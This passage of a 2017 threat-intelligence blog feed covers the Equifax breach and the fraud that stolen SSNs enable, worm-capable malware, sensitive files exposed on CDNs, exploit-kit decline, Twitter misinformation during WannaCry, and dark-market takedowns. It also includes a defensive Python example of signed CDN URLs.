    2. Initial Compromise
    3. Establish Foothold
    4. Escalate Privileges
    5. Internal Recon
    6. Move Laterally
    7. Maintain presence
    8. Complete Mission

    Successful exploitation of the Apache Struts server covers only the early steps of the eight: the initial compromise and, with a web shell in place, establishing a foothold. Everything after that still had to be carried out inside Equifax’s network.

    In order to effectively defend against attackers, an organization must have prevention and detection mechanisms operating at all stages of the attack lifecycle. It cannot be assumed that patching a particular web application framework against security vulnerabilities is sufficient.

    Assuming that attackers are able to penetrate the perimeter is the “assume breach” model, an essential part of a mature organization’s approach. In brief, it says a defender should assume attackers have already breached the outer defenses and are moving within the internal network, which corresponds to steps four through eight of the attack lifecycle. A defender can respond effectively to such an intrusion by applying the principle of least privilege to reduce privilege escalation vectors, limiting the opportunities for an attacker to move laterally, detecting abnormal behavior, hunting for newly introduced persistence mechanisms, and monitoring the network for suspiciously large transfers to unknown systems outside the organization.

    Combining these techniques is called “defense in depth” and allows an organization to be robust against attackers wielding zero day exploits.

    Equifax Breach: The Impact For Enterprises and Consumers Fri, 08 Sep 2017 08:36:49 +0000

    What we know about the Equifax breach

    On September 7th, credit reporting agency Equifax announced “a cybersecurity incident potentially impacting approximately 143 million U.S. consumers.” To put this in context, at this time, this incident is almost seven times larger than the Office of Personnel Management breach of 2015. Equifax discovered the unauthorized access on July 29th and determined that the intrusion began in mid-May. Equifax stated that “the information accessed primarily includes names, Social Security Numbers (SSNs), birth dates, addresses and, in some instances, driver’s license numbers. In addition, credit card numbers for approximately 209,000 U.S. consumers, and certain dispute documents with personal identifying information for approximately 182,000 U.S. consumers, were accessed.” In addition, the “limited personal information” for Canadian and United Kingdom citizens was all accessed. The initial attack vector was reported as a “web application vulnerability.”

    Figure 1. Chairman and Chief Executive Officer, Richard F. Smith discusses the Equifax Breach

    What we don’t know about the Equifax breach

    Whenever doing any sort of analysis, it is important to state what we don’t know. Simply put there is a great deal we don’t know and most of the public will never know (despite what some talking heads might claim). As a former incident responder, I know that investigations aren’t completed in the time it takes to complete an episode of TV drama Scorpion. (Did you know that Scorpion is starting its fourth season?) Equifax stated that the investigation is “substantially complete,” but wisely added that “it remains ongoing and is expected to be completed in the coming weeks.”

    • We don’t actually know how many SSNs were compromised.
    • We don’t know if all 143 million individual’s SSNs were impacted.
    • We don’t know the threat actor responsible for this intrusion. Equifax claimed that “criminals exploited” a web application, but attribution is always a challenge. Structured Analytic Techniques, like the Analysis of Competing Hypotheses we did for WannaCry, can be useful for considering attribution.
    • Speaking of web applications, although we don’t know the specific vulnerability that was exploited, I’d bet 1,000 Gold Dragons it was SQL injection.

    What is most likely to happen next

    There are a wide range of possibilities depending on the goals of the threat actor responsible for the Equifax intrusion. By the way, did I mention that attribution is challenging? Attribution aside, one thing is certain though, regardless of the motivations of the attackers, this data is perfect for social engineering attacks.

    Tax Return Fraud

    SSNs are highly valuable for criminals looking to commit tax refund fraud. Fraudsters use SSNs to file a tax return claiming a fraudulent refund and it can be hard to find out if you’re a victim until it is too late. There is some good advice from the IRS about what to do should you suffer from this form of fraud. You can read more about tax fraud in a blog we wrote earlier this year.

    Opening fraudulent accounts

    There is no shortage of alternative finance companies, such as those who provide short term loans. Fraudsters can successfully open accounts in another individual’s name, using a combination of SSNs, fraudulent gas statements and other personally identifiable information (PII). Individuals should be extra vigilant for any evidence of accounts being opened in their name.


    PII is valuable to payment card fraudsters, who require such information to bypass security controls such as “Verified by Visa”, which sometimes ask for digits of cardholders’ SSNs. There are plenty of high-quality cards that criminals use which do not require extra validation, but the lower-level carders must turn to SSNs to enrich lower-quality card dumps. It’s important to remember that SSNs and payment card fraud are inextricably linked.

    Figure 2: An example of a security control for online credit card payments

    Benefits Fraud and Medical care fraud

    Although less glamorous than tax return fraud and carding, benefit and medical care fraud is a real risk. As with tax return fraud, this is hard to detect when it happens, but individuals can be vigilant when checking their Explanation of Benefits statement and flag any unfamiliar activity to their insurance provider.

    Resale of data

    It’s important to note that the individuals responsible for the breach are unlikely to be the same criminals conducting the day-to-day fraud. In the case of the Experian breach, the stolen data soon made its way onto the (now defunct) Hansa marketplace. As I’ve previously mentioned, there’s already a market for SSNs to enrich credit card information, so it’s likely that many actors could end up getting a piece of the pie.

    For lower level criminals, the expenses associated with criminal activities will get even lower. SSNs are already cheap; on one AVC (Automated Vending Cart) site (shown in Figure 3), there are over 3.4 million SSNs for sale at only $1. This includes full names, addresses, and – for a large number of accounts – dates of birth. In California alone, there were 334,000 SSNs for sale.

    With tens (and potentially hundreds) of millions more SSNs potentially entering the market, the opportunities for criminals to commit fraud will increase and the price will decrease even more.

    Figure 3: A screenshot of an AVC selling Social Security Numbers

    So far, I’ve focused heavily on SSNs, but credit card information was also accessed in the breach. While this number is in the hundreds of thousands (209,000), it is unlikely to have a significant impact on an already burgeoning black market for credit card information.

    Enablement of nation state campaigns

    Although Equifax claimed this intrusion was conducted by a criminal threat actor, it is possible that this was a nation state actor. (Quick reminder to re-read my note from above “attribution is always a challenge.”) In the event that a nation state actor is responsible for the intrusion, then like the OPM breach, we won’t see the data being monetized in the criminal underground. The stolen data will be leveraged to enable nation states’ campaigns against their intelligence targets.

    Enablement of hacktivist campaigns

    If we are going to consider nation state actors, we should also consider hacktivist threat actors and their activities around the stolen data. If hacktivists were responsible (I think this is a pretty unlikely scenario, let’s call it #OPunlikely) you could expect to see them use the data to target organizations and individuals that run counter to their world views. Embarrassment and doxing, hacktivist go-tos, would come into play.

    What enterprises can learn from the Equifax breach

    1. Incident response takes time, and eradication in particular takes time. Equifax said that the intrusion was discovered on July 29th and that they “acted immediately to stop the intrusion.” Equifax’s goal was to contain the adversary that first day, but true eradication took much longer. It is important that you set expectations with your leadership about how long eradication could actually take.
    2. 3rd party risks raise their ugly head once again. Some aspects of this intrusion remind me of the September 2015 T-Mobile breach. In that intrusion, Experian was hosting T-Mobile data that an unauthorized party accessed, and this resulted in the loss of 15 million individuals’ records. Any organization with a business to business relationship with Equifax needs to find out the scope of any potential loss of their employee or customer data. This 3rd party exposure also highlights the need for 3rd party risk monitoring.
    3. Crisis communication is key. Effectively communicating during an intrusion is important; it won’t absolve you of your sins, but doing it wrong could make the situation far worse. Understanding when and what to communicate is also important. Equifax discovered the intrusion on July 29th and notified on September 7th. Some might ask why it took so long for the notification, but I don’t think that a month is that long. The investigation needs to be far enough along so that you can confidently communicate the situation. A CEO who comes out 2 days after a breach and then minimizes what is a much more significant threat will be performing a mea culpa in little time.
    4. GDPR will change the breach notification game. Now let me really trip you up: how would this situation play out if it was after May 25, 2018 and Equifax lost European Union citizens’ data? The General Data Protection Regulation changes everything with 72-hour breach notification windows. GDPR states, “This must be done within 72 hours of first having become aware of the breach.” When the fines do come into place, the timing of the communication will have a significant impact.

    What consumers can learn from the Equifax breach

    1. Consider taking advantage of Equifax’s offer. Although the irony is not lost on me, taking advantage of credit file monitoring and identity theft protection offers is important. Check out equifaxsecurity2017[.]com for more. If you don’t want to use Equifax for these services, I get it; look at alternatives from someone like Transunion or Experian.
    2. Be vigilant about your payment card activity. Use email/SMS alerts to notify you of account transactions over a set amount (e.g. $100) and under a set amount (e.g. $5). If an unauthorized transaction occurs you can be notified immediately, and can quickly take action. Be vigilant about your card activity and alert your bank about any suspicious activity.
    3. Address tax fraud with IRS Form 14039. If you find out you are a victim of tax return fraud, there are still things you can do. Victims can file and send an IRS Form 14039. Further details are available here.
    4. Check your Explanation of Benefits (EOB) statement. It might look like another piece of spam mail, but it is important to reconcile the EOB statements that your insurance sends you. This is your best bet to monitor for medical care fraud. Make sure to report any unfamiliar activity as soon as you observe it.
    5. Assume breach. In the corporate cyber security world, we have learned to “assume breach”. Consumers should also operate under the impression that their confidential data has been compromised.

    Digital Shadows will continue to monitor this situation and provide updates as needed.

    Return of the Worm: A Red Hat Analysis Thu, 07 Sep 2017 01:17:46 +0000 A computer worm is a piece of malware that is designed to replicate itself in order to spread to other machines. While worms have existed since at least the 1980s, they’ve made a surprise comeback in 2017. Notable pieces of malware, including ransomware and banking trojans, have sought to incorporate “wormable” functionalities. Following the WCry attacks, Rick Holland wrote a blog titled “The Early 2000s Called, They Want Their Worms Back”. Could 2017 be seen as the return of the worm? By using the Red Hat structured analytic technique, it’s possible to take the perspective of an attacker and understand the potential evolution of this technique in the near future.

    Worms in 2017

    In early 2017, the SamSam ransomware added self-propagation techniques. The developers of SamSam likely determined that the added technique would increase potential profits for the operators of the ransomware. More recently, Emotet and TrickBot, two banking trojans, added self-propagation to their functionality. Banking trojans target customers of online banking services in order to harvest their credentials and access accounts for subsequent fraudulent transfers. Both Emotet and TrickBot demonstrated a new capability that attempted to allow self-propagation through a network using two distinct techniques.

    1. Emotet relied on the brute-force cracking of credentials to spread internally among networked systems, using a list of passwords hard-coded into the malware. This was incorporated in the months after WCry and Petya, demonstrating how criminals track cyber trends and adjust their TTPs accordingly.
    2. The new TrickBot variant attempted to autonomously propagate among networked machines over the Server Message Block (SMB) service. There have been further indications that the exploit used in the TrickBot variant was ETERNALBLUE, an exploit for an SMB vulnerability (CVE-2017-0144). ETERNALBLUE was released by the Shadow Brokers in April 2017 and subsequently used in the WCry (WannaCry) attacks of May 2017.

    Over the past six months, there have been multiple instances of malware using network self-propagation techniques. As seen in Figure 1 below, the Backdoor.Nitol and Gh0st RAT trojans, WCry, and now, possibly, TrickBot have used ETERNALBLUE.

    Figure 1 – Timeline of malware adding self-propagation

    Red Hat Analysis

    The incorporation of a “worming” capability enables malware to propagate among machines within a local area network, and potentially between networks. This could enable a single successful delivery via a spam email, for example, to infect multiple machines.

    A lack of technical knowledge is one reason why we have seen a lack of adoption in the past. TrickBot is a well-developed and successful banking trojan, indicating that its operators were likely relatively well resourced; however, the newly added self-propagation modules were reportedly relatively poorly written in comparison to its older modules, suggesting a realistic possibility that they may still be under development.

    In order to assess the question of why banking trojan developers would adopt self-propagation techniques, we have conducted a Red Hat analysis exercise. Red Hat analysis is a structured analytic technique that prompts an analyst to change his or her point of reference from that of an analyst observing or predicting an adversary or competitor’s behavior, to someone who must make decisions within an existing operational culture. The technique works best when you are trying to predict the behavior of a specific person or adversary. The Red Hat analysis quadrant in Figure 2 shows the potential advantages, benefits, costs, and risks associated with future development of self-propagating techniques for banking trojans.

    Figure 2 – Red Hat analysis of developing self-propagation techniques for banking trojans

    The self-propagation outlook

    Actors or groups that can implement these techniques without compromising operational security would likely gain more profit. Given this, it’s likely that the development of self-propagation capabilities will continue in the near future.

    While there’s still limited information on how self-propagation techniques have increased the profitability of Emotet and TrickBot, the incorporation of these capabilities in multiple malware variants showed their developers and operators perceived the techniques as profitable. If development of self-propagation techniques continues, it will likely increase the extent to which a specific variant can impact an enterprise network. However, this would largely depend on how hardened a network is against such activity.

    Shortly after the WCry ransomware worm, we wrote a blog on 5 lessons we can learn from security engineering. The advice in this blog extends beyond the WCry incident, and provides good advice for protecting against the rise of wormable malware, covering these five areas:

      1. Default deny
      2. Least privilege
      3. (Attack) surface reduction
      4. Need to know/compartmentalization
      5. Defense in depth

    Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might be Affected and What You Can Do About It Wed, 06 Sep 2017 16:55:39 +0000

    Whether it was the Mirai botnet and Dyn or the “Cloudbleed” revelations, content delivery networks (CDNs) have been in the news recently. Research by Swisscom and Digital Shadows found over 100 million web pages and files exposed on CDNs, with many sensitive pdf, ppt and xls files publicly available online. The risks don’t stop here; if improperly configured, CDNs can be used to bypass age restrictions and registration requirements.

    What is a CDN?

    To start off, let’s level set on what a CDN does. A CDN is a system of distributed servers that deliver webpages and other web content to a user based on the geographic locations of the user, the origin of the webpage and a content delivery server. This means that users can access content a lot quicker, as well as making them less susceptible to denial of service attacks. Given that over 52% of the Alexa 1,000 websites use a CDN, you might not realize how often you are browsing CDN delivered content.

    Figure 1: Diagram of a CDN. Source:

    Research Methodology

    To assess the amount of content exposed by CDNs and the subsequent risk:

    1. We first enumerated as many Content Delivery Networks as possible and identified the most deployed CDNs. In total we identified 293 CDNs, many of which can be found here
    2. Searches for these domains were completed across Google, Yandex and Bing to identify the search engine with most coverage. Google was found to have the highest yield, having the most results in over 50 percent of the CDN providers.
    3. Other searches were performed to assess the number of file types and the sensitivity of these documents.
    4. Finally, more manual analysis was applied to understand the implications of the content of these documents.

    Over 100 Million Indexed Pages Leave Organizations Exposed

    In total, searches indicated that there were 103,944,919 indexed web pages and web content across the CDN domains we assessed. Of these, nearly 15 million CDN delivered web pages had pdfs on them. Many of these were benign, but over 22,000 were sensitively marked and not for public distribution.

    Some of the findings were enlightening. There was no shortage of intellectual property across pdfs and ppts, with designs, financial information, plans and pricing models and even reports about nuclear generating stations (Figure 2) all readily available.

    Figure 2: Nuclear Generating Station

    This could produce a gold mine for competitive intelligence, espionage and phishing. No hacking is necessary – the content is already out there.

    The publicly available spreadsheets (xls and csv files) were worrisome as well. Examples of the types of data discovered included:

    • Sensitively marked patient health testing data
    • A mobile app development competition database with exposed visa numbers, dates of birth, gender and occupation
    • Membership details of clubs with names, home addresses, emails and telephone numbers (See Figure 3)

    Figure 3: Spreadsheet

    CDNs can be used to bypass protection mechanisms

    Security mechanisms are put in place so that a website’s content is protected. However, in some instances, CDNs can be used to bypass these restrictions.

    Take YouTube’s age restrictions, for example. Navigating directly to the video itself will force users to log in and verify their age (Figure 4). By searching for the video through a CDN, users can bypass this control on age restriction.

    Figure 4: Age restriction on

    Figure 5: Bypassing YouTube’s age restriction via a CDN

    Secondly, we identified ways to bypass registration requirements for content. One online education platform charges between $99 and $995 a year; for this fee, users can access a wide range of course materials. Unless, that is, they choose to access these resources through the website’s CDN, which would cost the users nothing.

    Why it matters

    It is no surprise that there is sensitive information available through search engines; there are many instances of data exposed through an organization’s supply chain. As demonstrated by the previous examples, the impacts of these external digital risks include:

    • Loss of revenue
    • Reputation damage
    • Compliance issues

    Adversaries can reap the rewards of these CDN issues by directing and tailoring their searches to these domains.

    What can be done

    Let us be clear – most files and pages available through CDNs are perfectly benign. However, a subset of them can leave organizations exposed. Considering the upcoming EU GDPR regulations, it is important that organizations understand where their data exists online. The fact that CDNs duplicate this information can pose a risk for organizations. In various cases that we identified it was actually the CDN that was exposing the data without the organization’s consent. There are several things organizations can do to secure their data, and to identify and mitigate the risks associated with the digital shadows found on CDNs:

    1. Use URL signing and appropriate TTLs on URLs that you share. URL signing allows you to protect your files from unauthorized access with a key. Cdn777 provides good advice
    2. Have a defined document marking system, whether that is through Digital Rights Management (DRM) or a defined template system in MS Office. This will allow you to more readily identify which documents should or should not be available online;
    3. Ensure that your sensitive information is not being indexed by search engines. Most CDNs will offer guides on how to unindex pages. Hubspot, for example, provides good advice on how to use noindex and nofollow HTML metatags.
    4. Set up Google Alerts to monitor for the risks associated with CDNs. Understand that it isn’t always you that will be exposing these documents; often it is third parties.
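    As an added illustration of point 1 (this is example code written for this page, not Digital Shadows’ or any CDN vendor’s own implementation), the following shows the mechanics of a signed CDN URL with a TTL: the object path and an expiry timestamp are bound together under an HMAC key shared between the origin and the edge, so a link that is shared or indexed stops working after the TTL and cannot be re-pointed at another file. The query parameter names (expires, sig) and the CDN hostname are assumptions; real CDNs each use their own scheme.

```python
"""Signed CDN URLs with a time-to-live: issue, then verify at the edge.

Added example, not the page's or any CDN's own code. Assumes a hypothetical
CDN that accepts ?expires=<unix-ts>&sig=<hex-hmac-sha256> and shares a key
with the origin. The key and timestamps below are constructed for the demo.
"""
import hashlib
import hmac
import time
from typing import Optional, Tuple
from urllib.parse import parse_qs, urlencode, urlsplit


def _message(path: str, expires: int) -> bytes:
    # Bind the exact object path AND the expiry into the MAC, so neither the
    # file being served nor the lifetime can be changed without a new signature.
    return f"{path}\n{expires}".encode()


def sign_url(base_url: str, path: str, key: bytes, ttl_seconds: int,
             now: Optional[int] = None) -> str:
    """Return base_url + path with expires/sig query parameters appended."""
    now = int(time.time()) if now is None else now
    expires = now + ttl_seconds
    sig = hmac.new(key, _message(path, expires), hashlib.sha256).hexdigest()
    return f"{base_url}{path}?{urlencode({'expires': expires, 'sig': sig})}"


def verify_url(url: str, key: bytes, now: Optional[int] = None) -> Tuple[bool, str]:
    """Edge-side check: (True, 'ok') or (False, reason)."""
    now = int(time.time()) if now is None else now
    parts = urlsplit(url)
    qs = parse_qs(parts.query)
    try:
        expires = int(qs["expires"][0])
        sig = qs["sig"][0]
    except (KeyError, ValueError):
        return False, "missing or malformed expires/sig"
    # Check the TTL first; an expired link is refused even if well signed.
    if now > expires:
        return False, "expired"
    expected = hmac.new(key, _message(parts.path, expires), hashlib.sha256).hexdigest()
    # Constant-time comparison so the edge does not leak the MAC byte by byte.
    if not hmac.compare_digest(expected, sig):
        return False, "bad signature"
    return True, "ok"


if __name__ == "__main__":
    KEY = b"constructed-demo-key"          # constructed; a real key is random
    T0 = 1_500_000_000                      # constructed "issue time"
    url = sign_url("https://cdn.example", "/reports/plant-report.pdf", KEY, 300, now=T0)
    print(url)
    print("fresh:   ", verify_url(url, KEY, now=T0 + 100))
    print("expired: ", verify_url(url, KEY, now=T0 + 400))
    # Re-pointing the link at a different object breaks the MAC.
    print("tampered:", verify_url(url.replace("plant-report.pdf", "other.pdf"), KEY, now=T0 + 100))
    # Extending the lifetime by editing the expires parameter also breaks it.
    print("extended:", verify_url(url.replace("expires=1500000300", "expires=1500009999"), KEY, now=T0 + 100))
```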

    Bitglass: Compromised Credentials are Just One Way Your Corporate Data is Being Exposed Fri, 18 Aug 2017 19:19:25 +0000 A guest blog from Bitglass, read the original at 

    Every day, employees around the world use the cloud to perform their jobs. With bring your own device (BYOD), workers are given dynamic data access to complete their work from unmanaged devices, remote locations, and unsafe WiFi. Due to the host of modern cloud applications, corporate information can be stored in more places and shared more widely than ever. Together, these trends of BYOD, remote data access, and widespread sharing put enterprise data in jeopardy.

    In its recent study, “Datawatch,” Bitglass explored the ways in which sensitive information can be put at risk by careless employee behavior, and conducted experiments to gain insight into how easily corporate data can leak.

    Unsecured Public WiFi

    Many individuals see free public WiFi as a helpful avenue for internet access and completing work. However, such networks are typically unsecured and can allow mischievous parties to steal login credentials and other sensitive information. To uncover how easily this kind of theft can occur, Bitglass provided free public WiFi at random Bay Area locations to determine how many people would connect and what domains they would visit once online.

    Sharing and Malware

    The degree to which files are shared across cloud applications can expose corporate data. Organizations can be put at risk by malicious and unauthorized users accessing sensitive information. Additionally, if even one employee is infected by malware or ransomware, she or he can spread it throughout the company merely by uploading an infected document to a shared cloud app. To test this, Bitglass analyzed how widely its customers share their data across multiple cloud applications.

    Compromised Credentials

    In light of the above scenarios, it’s apparent that one set of compromised credentials can lead to excessive data exposure. In its Compromised Credentials report, Digital Shadows, a company that gives deep analytics on digital risk, provides insight and surprising statistics on compromised credentials and the dark web.

    Geography of Leaked Credentials

    To learn more about data exposure and the results of Bitglass’ experiments, download the full report.

    Fluctuation in the Exploit Kit Market – Temporary Blip or Long-Term Trend? Wed, 16 Aug 2017 16:57:43 +0000 Exploit kit activity is waning. Collectively these malware distribution tools used to be a prominent method of infection. They rely on compromised websites, malicious adverts and social engineering to direct web traffic to their landing pages and attempt the exploitation of vulnerable software. Operated by various actors and groups, exploit kits possess different features, use various exploits and distribute different malware to victims. Since June 2016 at least four of the major players in this area ceased to be active. In this blog, I wanted to explore which exploit kits are still around and propose some plausible scenarios for the future of the exploit kit landscape.

    In memoriam

    Before we look at the active kits, let’s take a moment to remember those that have gone on to greener pastures (at least for now, some kits have a habit of rising from the dead). Note I’ve only referenced the major players from the last two years in this section:

    The survivors

    Despite these disappearances, the exploit kit landscape still represents a threat. Using mentions of exploit kits across social media and blogs that have been made by security researchers, we can formulate an indication of how active each exploit kit actually is. In the graph below, we can see that the RIG exploit kit has been mentioned most frequently from June until the time of writing, indicating it is likely to be the most prominent. All of the other kits shown in the graph, with the exception of Neutrino, still had some activity associated with them which showed they were still being deployed in the wild. Nevertheless, the rate at which they were detected and reported by researchers suggested they were likely less prevalent overall.

    Researcher mentions of exploit kit detections on social media and blog sites could provide reasonable insight into levels of exploit kit activity. Considering the findings, we assess it is highly likely the threat posed by EKs is less overall than it was in June of 2016, and even at the start of 2017. However, some exploit kits remain active and, depending on the number of operators using them or the scale of the campaigns, the threat still remains. Exploit kits typically rely on out-of-date browsers or browser plugins, therefore the primary mitigation for this threat is to ensure patches are implemented as soon as possible. In particular, exploit kit authors favor remote code execution exploits; our previous analysis of exploit kit payloads demonstrates this.

    Figure – Exploit kit activity: researcher mentions of exploit kits on social media and blog sites

    Figure – Exploit kit mentions on dark web sources

    A potential reason for the decline of exploit kits

    The reasons for these disappearances were unconfirmed in most cases, but at least one EK developer was reported to have claimed it was no longer profitable.

    There are a number of other possible explanations for this overall decline, including law enforcement action or the relatively resource intensive nature of exploit kit operations. Running these operations can be laborious:

    1. Software development of the exploit kit.
    2. Acquisition of remote code execution exploits for browser-related software
    3. Registration of large numbers of domains to host the exploit kits
    4. Generation of traffic to the exploit kit landing pages for exploitation. Generating this traffic requires the compromise of websites, use of malicious advertising or use of spam emails.

    Furthermore, exploit kit operators contend with advert blockers, software updates and blacklists which all degrade the rates of successful exploitation. All of these factors suggest a realistic possibility that exploit kit developers or operators no longer consider them to be profitable. At a time when spam phishing campaigns were frequently used to distribute ransomware, a demonstrably lucrative type of malware, distributing malware via exploit kits is almost certainly highly resource intensive by comparison. We’ve recently seen actors experimenting with malware propagation within internal networks, shown by the TrickBot and Emotet banking trojans, which represents another method of spreading malware to multiple devices.

    Are exploit kits dying out?

    Based on the exploit kit trends we have observed over the last year, it is a realistic possibility that these tools will continue to be used less frequently as part of malware distribution in the long term. The use of large quantities of phishing emails containing document attachments with embedded scripts to download malware has proven to be highly popular and successful in the last year. Therefore, threat actors could possibly move from exploit kits to malware distribution using this type of method. However, there are multiple scenarios to consider:

    1. Given a lack of competition, one exploit kit might become the most dominant. Large amounts of business going to one kit could allow it to be developed more frequently and for its developers to acquire new exploits.
    2. Following the disappearance of large exploit kits, new kits could emerge that attempt to fill the market gap.
    3. Exploit kits could decline overall but still be used in more targeted attacks. The compromise of the Polish Financial Supervision Authority website in February of 2017 involved the use of tactics, techniques and procedures similar to those of exploit kits.
    4. Technology to detect and block malicious emails could improve to the point that this distribution method becomes less viable, resulting in a return to exploit kit activity, which depends on endpoint management of software updates or other patch management solutions.

    Scenarios are useful because they provide us with indicators to look for when examining threat landscapes. While it’s not always possible to say with full confidence how the future might look, the thought exercise itself can be useful. Despite these potential scenarios, exploit kits will almost certainly continue to remain a threat in the immediate future.

    All That Twitterz Is Not Gold: Why You Need to Rely on Multiple Sources of Intelligence Wed, 09 Aug 2017 19:17:43 +0000 Twitter has become an extremely valuable tool for security researchers; experts including Kevin Beaumont and PwnAllTheThings frequently post research findings on the site and following these feeds can be an excellent source for the latest developments in the information security space. However, during major incidents affecting organizations worldwide, including the outbreaks of wCry and NotPetya, relying too heavily on Twitter can cause major problems for organizations scrambling to respond.

    Unwitting misinformation

    On May 12th, when the scale of the spread of wCry began to become apparent, researchers and businesses scrambled to ascertain how the malware was spreading as security operations analysts attempted to harden their networks against the threat. During this period, many users and some media outlets speculated that the malware might be spreading via an email vector.

    Figure 1 – Screenshot of tweet on a supposed email vector for wCry.

    Even though little specific information was available, many users assumed that email had been the vector.

    Figure 2 – Screenshot of tweet on a supposed email vector for wCry.

    While this might often be a safe assumption (spam email is by far the most common vector for ransomware delivery), in this case it was an unproven one. It later emerged that a major contributor to the confusion was a spam campaign delivering the Jaff ransomware, which was highly active on the same day. While it was not confirmed until later, throughout the afternoon of May 12th multiple researchers accurately identified the true propagation vector used by wCry – SMB. Unfortunately, in some instances security advice was given on the basis of this understandable confusion, potentially leading to security operations personnel spending time hunting spam emails while a greater threat lay elsewhere.

    Figure 3 – Notification from security software-as-a-service provider MailGuard.

    Information versus intelligence

    While potentially very useful, information derived from sources such as Twitter should always be treated with caution and assessed in the context of information derived from other sources, particularly when it’s being used to inform a security team’s actions in a time sensitive situation.

    This is the difference between information and intelligence; intelligence is aggregated data which has been assessed for credibility and presented in context with appropriate caveats for uncertainty and an assessment of significance. While intelligence must be timely to be useful, unassessed information which may be inaccurate can be even more damaging than the delay required to complete a full assessment.

    When the Digital Shadows analyst team investigated wCry on May 12th, we were able to identify indications that suggested spam emails were not the vector being used, leading us to pursue alternative hypotheses that the malware was spreading over SMB. While we are hugely appreciative of the work researchers do to raise awareness of security issues on Twitter and make extensive use of this source, we have found on many occasions that relying on this alone has the potential to lead to operational mistakes and misallocation of resources.

    Cybercrime Finds a Way, the Limited Impact of AlphaBay and Hansa’s Demise Mon, 07 Aug 2017 23:14:37 +0000 The law enforcement operations that took down the AlphaBay and Hansa marketplaces were meant to strike a sizable blow to the online trade of illegal goods and services. Frequenters of these services might now think twice before placing their trust in these unregulated platforms, and there may well be further arrests to follow as investigations and analysis into the materials seized in these raids run their course.

    However, when a drug enforcement operation completes a major bust or arrests a large number of individuals, there is almost always another group, or new recruits, ready to fill the void. Similarly, our analysis of the broader cybercriminal ecosystem suggests that the impact of the AlphaBay and Hansa closures will be somewhat short-lived, for at least three reasons:

    1. The game of whack-a-mole continues, cybercrime will find a way

    With AlphaBay and Hansa out of the picture, sellers and users will flock to other marketplaces to continue trading as before. This has been evident already, with former AlphaBay and Hansa users advertising on established forums such as Dream Market, TradeRoute, House of Lions and Wall Street Market, which we focused on in our previous blog.

    Marketplace takedowns are not a new phenomenon. When Silk Road, once the largest and most popular dark web marketplace, was disrupted by the Federal Bureau of Investigation (FBI) in 2013, this only precipitated the growth of other, alternative platforms. AlphaBay grew from Silk Road’s closure and eventually took on the mantle of the most popular dark web market. Subsequent reincarnations of Silk Road in the form of Silk Road 2.0 and Silk Road 3.0 exemplify how the cycle will likely continue for the foreseeable future. We have seen alternatives emerge as a result of marketplace exit scams as well. In 2015, administrators of the Evolution marketplace stole an estimated 40,000 BTC. Dream Market was one of the beneficiaries of that exit scam.

    Just as Jeff Goldblum’s Jurassic Park character, Doctor Ian Malcolm says, “Life uh, finds a way,” cybercrime finds a way as well. Commerce must flow; buyers and sellers need to be connected.


    2. AlphaBay and Hansa were only a part of a broader cybercrime ecosystem

    Yes, AlphaBay and Hansa were two of the most popular English-language dark web marketplaces. And yes, they had dedicated sections for fraud-related goods (stolen payment card information, counterfeit documents, and compromised bank accounts), as well as malware and hacking tools (the RIG and Bleeding Life exploit kits were previously advertised on AlphaBay). However, from an information security perspective, we should remember that most of the products advertised on these platforms were drugs, weapons, and digital goods such as media accounts and service subscriptions.

    Our research shows that there are other forums specifically dedicated to hacking and security, which often act as a platform for trade. Sites like CrimeNet, HPC, and Exploit[.]in contain many examples of threat actors offering products such as ransomware variants, exploit kits, compromised accounts and payment card data. These sites work on a direct transfer system where vendors and customers will communicate directly to arrange payment, often through messaging services such as Jabber. Often sellers will advertise their products on these forums, and then direct users to dark web sites to then arrange payment. Where stolen databases have appeared on sites like Hansa, we assessed it to be highly likely that these datasets were previously traded widely through other criminal networks and then listed on these marketplaces only once their value had been exhausted.


    Figure 1: Advert on deep web forum HPC for FileFrozr ransomware

    Payment card fraud is a good example of why we should not focus too heavily on marketplaces. There are countless carding and Automated Vending Cart (AVC) sites dedicated to payment card fraud. These types of sites often provide tutorials and courses for novice fraudsters, as we highlight in our recent whitepaper. With new carding and AVC sites emerging every day, this type of activity will continue unabated despite the AlphaBay and Hansa takedowns.


    Figure 2: AVC site allowing users to buy stolen payment card data

    3. Not all cybercrime occurs on the dark web

    Many carding, AVC and hacking sites are not actually found on the dark web, including HPC, CrimeNet and Exploit, which we mentioned above. Moreover, certain types of cybercrime do not need the “anonymity” provided by services such as Tor, or the advertising and transactional functions fulfilled by the marketplace model. Plenty of cybercrime occurs on the open and deep web.

    Extortion activity by thedarkoverlord, a threat actor we have cited previously, illustrates this point. When thedarkoverlord first came to our attention in June 2016, the actor relied heavily on dark web sites such as the Real Deal to advertise stolen datasets. Yet, since the closure of the Real Deal in November 2016, thedarkoverlord has remained active and has made use of clear web sites such as Pastebin and Twitter to conduct extortion-based activity. In June 2017, thedarkoverlord released eight episodes of an un-aired American Broadcasting Company (ABC) show, posting a message to Pastebin that included a link to the torrent website The Pirate Bay. Three days later, thedarkoverlord published over 6,000 medical records that allegedly belonged to a clinic in California. The documents were uploaded to the sharing site mega[.]nz after the clinic purportedly failed to respond to the ransom demands.

    While the AlphaBay and Hansa takedowns will likely provide significant intelligence gains, there will always be supply and demand for illicit goods and services. Digital Shadows will continue monitoring the development of the cybercriminal ecosystem, particularly in these turbulent times. Marketplaces were never seen as the go-to shop for rare exploits or sensitive datasets, and we expect the more sophisticated sellers to continue using more niche forums or private communication channels to flog their wares. Moreover, with other forms of cybercrime occurring outside of the dark web, organizations and individuals would be wrong to assume that the risk of a cyber-attack has now been significantly reduced.

    Reading Your Texts For Fun and Profit – How Criminals Subvert SMS-Based MFA Tue, 01 Aug 2017 13:57:24 +0000 Why Multi Factor?

    Read almost any cyber security related news and you will start to see why using a password alone isn’t the most secure way of preventing unauthorized access to your account. Multi-factor authentication (MFA) is invaluable because it adds extra obstacles for attackers attempting to access your account, hence why it has become such a popular account security control. There are different flavors of MFA ranging from codes sent via text (SMS), authentication applications, or physical devices. Naturally attackers are going to try and circumvent MFA, so we conducted some research into the ways SMS-based MFA could be subverted, which are outlined below.

    Threats to SMS Based Solutions

